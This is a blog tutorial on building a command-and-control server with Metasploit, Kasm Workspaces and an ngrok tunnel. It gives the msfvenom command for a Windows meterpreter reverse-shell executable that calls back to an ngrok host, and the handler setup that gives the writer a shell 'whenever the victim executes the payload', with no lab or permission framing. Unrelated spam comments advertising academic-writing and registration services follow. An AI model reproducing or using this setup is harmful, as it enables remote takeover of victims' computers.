Setting up a C&C Server with Metasploit and Kasm Workspaces
- Teja Swaroop
- Jan 30, 2024
- 3 min read
In this article, I will walk you through setting up your Command and Control Server using Metasploit and Kasm Workspaces.
Metasploit is a penetration testing framework that contains a payload generator, many modules to enumerate and exploit different known vulnerabilities on different targets. It can also be used as a Command and Control (C&C) server by managing target sessions, maintain persistence, perform post exploitation, etc., It is a must-have tool in any hacker's toolkit.
Kasm is a docker container streaming platform which enables you to run private sessions of docker apps and use them directly from your web browser. It supports many awesome features like session casting, ability to destroy/pause/resume sessions and so on. You can keep your docker apps organized and at one place to be readily usable with the help of Kasm.
We will first setup a Kali Linux hacking lab in Kasm workspaces and then use the pre-installed Metasploit framework from the Kali Linux container.
Install Kasm
Kasm can be installed on any Linux machine with at least 2 CPU cores, 4 GB memory and 50GB SSD storage. I like to install Kasm on a cloud instance because I want my C&C server to be always available and online. However, you can install Kasm on your local Linux machine as well. The official installation guide for Kasm is here: https://kasmweb.com/docs/latest/index.html
Just run these five simple commands to install Kasm:
# Go to /tmp
cd /tmp
# Download Kasm
curl -O https://kasm-static-content.s3.amazonaws.com/kasm_release_1.14.0.3a7abb.tar.gz
# Extract
tar -xf kasm_release_1.14.0.3a7abb.tar.gz
# Install Kasm
sudo bash kasm_release/install.shGreat! Now that you have Kasm installed, you can login to your dashboard by going to https://<YOUR_IP>
You can login with the default credentials that were displayed on the terminal when Kasm is done installing.
Install Kali Linux
Kali Linux is a Linux distribution designed for digital forensics and penetration testing. It comes with Metasploit pre-installed.
From your dashboard, go to Workspaces -> Add from Registry and install Kali Linux from the list of available docker images.
Once Kali is installed, go back to Workspaces and open a new session.
That's it! You now have a Kali Linux session.
Setup tunneling
Since you are using Kali Linux as a docker container - you will not be able to receive inbound connections from the internet. However, it is very important for your C&C server to be available on the Internet to receive connections from the targets. To fix this, you can use ngrok to create a secure tunnel from the Internet to your local network interface.
Go to ngrok.com, create an account and download ngrok
On the download page, you will also find the command to activate your ngrok tool with your unique auth token - simply copy and paste it on your terminal to authenticate.
Now, use the following command to setup a tunnel:
./ngrok tcp 1560This will create a tunnel from the ngrok servers (which are accessible from the Internet) to your localhost on port 1560. Feel free to use whatever port you like.
This will generate an ngrok address (6.tcp.ngrok.io) in my case and a unique port (17800) in my case.
You can use this address and port whenever you are creating a payload. For example, let me create a payload with msfvenom for a windows target with the command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17800 -f exe > payload.exeNotice how I used my ngrok address for the LHOST and my unique ngrok port for the LPORT. When a connection is received on this address and port, ngrok forwards it to my localhost on port 1560.
Now, to setup the listener - I will just open my Metasploit console with the msfconsole command and use exploit/multi/handler - then set the payload to the same (windows/x64/meterpreter/reverse_tcp)
I will then set the LHOST to localhost and LPORT to 1560 because this is where the connections from the Internet will be forwarded to by ngrok.
That's it! I will now simply type run and my listener is online. Now, whenever the victim executes the payload, I get a reverse shell on my msfconsole!
And just like that we are able to setup a C&C server on the cloud with the help of Kasm Workspaces and Metasploit!
At MakeAssignmentHelp, we proudly offer expert Engineering Assignment Help tailored to guide students through the complex world of technical education. With a deep understanding of engineering principles and academic standards, our seasoned writers craft assignments, theses, research papers, and dissertations that reflect both precision and excellence. Whether it’s mechanical, civil, electrical, or computer engineering, we provide personalized solutions to ensure academic success. Our services are rooted in quality, timely delivery, and originality—because we believe every engineering mind deserves a solid foundation. MakeAssignmentHelp is your trusted academic partner, dedicated to turning your challenges into achievements. When deadlines loom and concepts confuse, let our experienced team lead you to clarity and confidence with unmatched Engineering Assignment Help you can rely on.
Looking to start your own business? OPC registration is a great option for solo entrepreneurs! At Taxlegit, we simplify the OPC registration process with expert guidance and hassle-free documentation. As a trusted legal website, we ensure fast, reliable, and affordable services. Start your One Person Company today with Taxlegit and take the first step toward success!
Students looking for reliable Online Homework Help in the USA can trust MakeAssignmentHelp. Their platform connects learners with qualified experts who provide detailed and plagiarism-free solutions. Covering all academic subjects, their service is fast, secure, and student-friendly. Whether facing deadlines or complex topics, MakeAssignmentHelp ensures every homework is handled with care and professionalism.
If you're searching for top-notch Digital Marketing Training in Noida, Growth Wonders is the place to be. With expert mentors, hands-on projects, and 100% practical learning, it's ideal for students and professionals alike. Get job-ready with in-demand skills like SEO, Google Ads, and more—all from the heart of Noida.
NGO Experts is a trusted legal platform offering seamless DARPAN NGO registration services. Their expert team ensures quick and hassle-free registration, helping NGOs gain credibility and access government schemes. With a professional approach and in-depth knowledge, NGO Experts simplify the entire process, making them the go-to choice for DARPAN registration. Highly recommended for NGOs seeking reliable support.